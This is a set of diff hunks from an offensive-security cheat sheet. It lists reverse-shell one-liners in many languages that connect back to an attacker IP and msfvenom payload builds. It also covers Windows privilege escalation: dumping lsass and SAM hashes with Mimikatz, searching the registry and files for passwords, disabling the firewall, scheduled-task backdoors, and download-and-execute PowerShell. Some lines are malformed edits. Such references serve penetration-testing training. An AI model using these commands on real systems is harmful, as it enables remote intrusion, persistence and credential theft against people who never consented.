-C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
+C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.10.10.10', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
 ```
 ### PHP
@@ -67,16 +118,23 @@ NOTE: Windows only
 ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 ```
 ### Golang
 ```bash
 echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
 ```
 ### Netcat Traditional
 ```bash
 nc -e /bin/sh [IPADDR] [PORT]
 nc.traditional -e /bin/bash 10.0.0.1 4444
 ```
 ### Netcat OpenBsd
 ```bash
-rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
 ```
 ### Ncat
@@ -86,14 +144,25 @@ ncat 127.0.0.1 4444 -e /bin/bash
 ncat --udp 127.0.0.1 4444 -e /bin/bash
 ```
 ### OpenSSL
 ```powershell
 hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
 hacker@kali$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
 or
 hacker@kali$ ncat --ssl -vv -l -p 4242
 user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4242 > /tmp/s; rm /tmp/s
 ```
 ### Powershell
 ```powershell
-powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
 ```powershell
-powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
+powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 ```
 ```powershell
@@ -103,29 +172,37 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse
 ### Awk
 ```powershell
-awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
+awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
 ```
 ### Java
 ```java
 r = Runtime.getRuntime()
-p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
+p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
 p.waitFor()
 ```
 ### War
 ```java
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
 strings reverse.war | grep jsp # in order to get the name of the file
 ```
 ### Lua
 Linux only
 ```powershell
-lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
+lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"
 ```
 Windows and Linux
 ```powershell
-lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
+lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 ```
 ### NodeJS
@@ -136,7 +213,7 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
-    client.connect(8080, "10.17.26.64", function(){
+    client.connect(4242, "10.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
@@ -147,16 +224,21 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
 or
-require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
+require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242')
 or
 -var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
+-x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash')
 or
 https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 ```
-### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
+### Groovy
 by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
 NOTE: Java reverse shell also work for Groovy
 ```javascript
@@ -166,15 +248,88 @@ String cmd="cmd.exe";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 ```
-## Spawn TTY
+## Meterpreter Shell
-```bash
+### Windows Staged reverse TCP
 /bin/sh -i
 ```
 (From an interpreter)
 ```powershell
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe
 ```
 ### Windows Stageless reverse TCP
 ```powershell
 $ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe
 ```
 ### Linux Staged reverse TCP
 ```powershell
 $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf
 ```
 ### Linux Stageless reverse TCP
 ```powershell
 $ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf
 ```
 ### Other platforms
 ```powershell
 $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
 $ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
 $ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
 $ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
 $ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
 $ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
 $ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl
 $ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
 ```
 ## Spawn TTY Shell
 In order to catch a shell, you need to listen on the desired port. `rlwrap` will enhance the shell, allowing you to clear the screen with `[CTRL] + [L]`.
 ```powershell
 rlwrap nc localhost 80
 ```
 Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell.
 :warning: OhMyZSH might break this trick, a simple `sh` is recommended
 > The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
 ```powershell
 ctrl+z
 echo $TERM && tput lines && tput cols
 # for bash
 stty raw -echo
 fg
 # for zsh
 stty raw -echo; fg
 reset
 export SHELL=bash
 export TERM=xterm-256color
 stty rows <num> columns <cols>
 ```
 or use `socat` binary to get a fully tty reverse shell
 ```bash
 socat file:`tty`,raw,echo=0 tcp-listen:12345
 ```
 Spawn a TTY shell from an interpreter
 ```powershell
 /bin/sh -i
 python -c 'import pty; pty.spawn("/bin/sh")'
 perl -e 'exec "/bin/sh";'
 perl: exec "/bin/sh";
@@ -182,36 +337,9 @@ ruby: exec "/bin/sh"
 lua: os.execute('/bin/sh')
 ```
 Access shortcuts, su, nano and autocomplete in a partially tty shell
 /!\ OhMyZSH might break this trick, a simple `sh` is recommended
 ```powershell
 # in host
 ctrl+z
 stty raw -echo
 fg
-# in reverse shell
+## References
 reset
 export SHELL=bash
 export TERM=xterm-256color
 stty rows <num> columns <cols>
 ```
 (From within vi)
 ```bash
 :!bash
 :set shell=/bin/bash:shell
 ```
 (From within nmap)
 ```sh
 !sh
 ```
 ## Thanks to
 * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
 * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
--- a/Resources/Subdomains
+++ b/Resources/Subdomains
@@ -12,6 +12,7 @@
  * Aquatone (Ruby and Go versions)
  * AltDNS
  * MassDNS
  * Nmap
 * Subdomain take over
  * tko-subs
  * HostileSubBruteForcer
@@ -144,6 +145,12 @@ DNS_RESOLVERS="./resolvers.txt"
 cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/results_subfinder_resolved.txt
 ```
 ### Using Nmap
 ```powershell
 nmap -sn --script hostmap-crtsh host_to_scan.tld
 ```
 ## Subdomain take over
 Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records.
@@ -170,7 +177,7 @@ go get github.com/Ice3man543/SubOver
 ./SubOver -l subdomains.txt
 ```
-## Thanks
+## References
 * [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/)
 * [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -101,6 +101,6 @@ bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>
 ```
-## Thanks to
+## References
 - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full
 mimikatz_command -f sekurlsa::wdigest
 ```
 ## Mimikatz - Mini Dump
 Dump the lsass process.
 ```powershell
 C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 net use Z: https://live.sysinternals.com
 Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 ```
 Then load it inside Mimikatz.
 ```powershell
 mimikatz # sekurlsa::minidump lsass.dmp
 Switch to minidump
 mimikatz # sekurlsa::logonPasswords
 ```
 ## Mimikatz Golden ticket
 ```powershell
@@ -85,7 +104,7 @@ More informations can be grabbed from the Memory with :
 - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
-## Thanks to
+## References
 - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
 - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -63,7 +63,7 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
-## Thanks to
+## References
 * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
 * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -117,7 +117,7 @@ implant/utils/download_file | Downloads a file from the target zombie.
 implant/utils/multi_module | Run a number of implants in succession.
 implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
-## Thanks
+## References
 - [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
 - [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -1,6 +1,54 @@
 # Windows - Privilege Escalation
-Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
+## Summary
 * [Tools](#tools)
 * [Windows Version and Configuration](#windows-version-and-configuration)
 * [User Enumeration](#user-enumeration)
 * [Network Enumeration](#network-enumeration)
 * [EoP - Looting for passwords](#eop---looting-for-passwords)
 * [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
 * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
 * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
 * [EoP - Unquoted Service Paths](#eop---unquoted-service-paths)
 * [EoP - Kernel Exploitation](#eop---kernel-exploitation)
 * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
 * [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
 * [EoP - Runas](#eop---runas)
 * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
  * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato)
  * [MS08-067 (NetAPI)](#ms08-067-netapi)
  * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
  * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
  * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
  * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
 ## Tools
 - [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
    ```powershell
    powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
    ```
 - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
 - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
    ```powershell
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1
    ```
 - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
 - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
    ```powershell
    ./windows-exploit-suggester.py --update
    ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt 
    ```
 - [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
 - [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
 - [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
 - [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt)
 - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
 - [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
    ```powershell
    powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
    ```
 ## Windows Version and Configuration
@@ -8,6 +56,11 @@ Almost all of the following commands are from [The Open Source Windows Privilege
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
 ```
 Extract patchs and updates
 ```powershell
 wmic qfe
 ```
 Architecture
 ```powershell
@@ -18,12 +71,15 @@ List all env variables
 ```powershell
 set
 Get-ChildItem Env: | ft Key,Value
 ```
 List all drives
 ```powershell
 wmic logicaldisk get caption || fsutil fsinfo drives
 wmic logicaldisk get caption,description,providername
 Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
 ```
 ## User Enumeration
@@ -32,6 +88,13 @@ Get current username
 ```powershell
 echo %USERNAME% || whoami
 $env:username
 ```
 List user privilege
 ```powershell
 whoami /priv
 ```
 List all users
@@ -39,11 +102,13 @@ List all users
 ```powershell
 net user
 whoami /all
 Get-LocalUser | ft Name,Enabled,LastLogon
 Get-ChildItem C:\Users -Force | select Name
 ```
 List logon requirements; useable for bruteforcing
-```powershell
+```powershell$env:usernadsc
 net accounts
 ```
@@ -59,32 +124,39 @@ List all local groups
 ```powershell
 net localgroup
 Get-LocalGroup | ft Name
 ```
 Get details about a group (i.e. administrators)
 ```powershell
 net localgroup administrators
 Get-LocalGroupMember Administrators | ft Name, PrincipalSource
 Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
 ```
 ## Network Enumeration
-List all network interfaces
+List all network interfaces, IP, and DNS.
 ```powershell
 ipconfig /all
 Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
 Get-DnsClientServerAddress -AddressFamily IPv4 | ft
 ```
 List current routing table
 ```powershell
 route print
 Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
 ```
 List the ARP table
 ```powershell
 arp -A
 Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
 ```
 List all current connections
@@ -93,10 +165,28 @@ List all current connections
 netstat -ano
 ```
-List firware state and current configuration
+List firewall state and current configuration
 ```powershell
 netsh advfirewall firewall dump
 or 
 netsh firewall show state
 netsh firewall show config
 ```
 List firewall's blocked ports
 ```powershell
 $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
 ```
 Disable firewall
 ```powershell
 netsh firewall set opmode disable
 netsh advfirewall set allprofiles state off
 ```
 List all network shares
@@ -105,25 +195,69 @@ List all network shares
 net share
 ```
-## Looting for passwords
+SNMP Configuration
-### Search for file contents**
+```powershell
 reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
 Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 ```
 ## EoP - Looting for passwords
 ### SAM and SYSTEM files
 The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
 ```powershell
 # Usually %SYSTEMROOT% = C:\Windows
 %SYSTEMROOT%\repair\SAM
 %SYSTEMROOT%\System32\config\RegBack\SAM
 %SYSTEMROOT%\System32\config\SAM
 %SYSTEMROOT%\repair\system
 %SYSTEMROOT%\System32\config\SYSTEM
 %SYSTEMROOT%\System32\config\RegBack\system
 ```
 Generate a hash file for John using `pwdump` or `samdump2`.
 ```powershell
 pwdump SYSTEM SAM > /root/sam.txt
 samdump2 SYSTEM SAM -o sam.txt
 ```
 Then crack it with `john -format=NT /root/sam.txt`.
 ### Search for file contents
 ```powershell
 cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
 findstr /si password *.xml *.ini *.txt *.config
 findstr /spin "password" *.*
 ```
 ### Search for a file with a certain filename
 ```powershell
 dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
 where /R C:\ user.txt
 where /R C:\ *.ini
 ```
-### Search the registry for key names
+### Search the registry for key names and passwords
 ```powershell
 REG QUERY HKLM /F "password" /t REG_SZ /S /K
 REG QUERY HKCU /F "password" /t REG_SZ /S /K
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
 reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
 reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
 reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
 reg query HKLM /f password /t REG_SZ /s
 reg query HKCU /f password /t REG_SZ /s
 ```
 ### Read a value of a certain sub key
@@ -132,9 +266,9 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /K
 REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 ```
-### Password in unattend.xml
+### Passwords in unattend.xml
-Location of the unattend.xml files
+Location of the unattend.xml files.
 ```powershell
 C:\unattend.xml
@@ -144,12 +278,14 @@ C:\Windows\system32\sysprep.inf
 C:\Windows\system32\sysprep\sysprep.xml
 ```
 Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`.
 Example content
 ```powershell
 <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
    <AutoLogon>
-     <Password>*SENSITIVE*DATA*DELETED*</Password>
+     <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
     <Enabled>true</Enabled>
     <Username>Administrateur</Username>
    </AutoLogon>
@@ -165,14 +301,90 @@ Example content
    </UserAccounts>
 ```
 Unattend credentials are stored in base64 and can be decoded manually with base64.
 ```powershell
 $ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo="  | base64 -d 
 SecretSecurePassword1234*
 ```
 The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
-## Processes Enum
+### IIS Web config
 ```powershell
 Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
 ```
 ```powershell
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
 C:\inetpub\wwwroot\web.config
 ```
 ### Other files
 ```bat
 %SYSTEMDRIVE%\pagefile.sys
 %WINDIR%\debug\NetSetup.log
 %WINDIR%\repair\sam
 %WINDIR%\repair\system
 %WINDIR%\repair\software, %WINDIR%\repair\security
 %WINDIR%\iis6.log
 %WINDIR%\system32\config\AppEvent.Evt
 %WINDIR%\system32\config\SecEvent.Evt
 %WINDIR%\system32\config\default.sav
 %WINDIR%\system32\config\security.sav
 %WINDIR%\system32\config\software.sav
 %WINDIR%\system32\config\system.sav
 %WINDIR%\system32\CCM\logs\*.log
 %USERPROFILE%\ntuser.dat
 %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
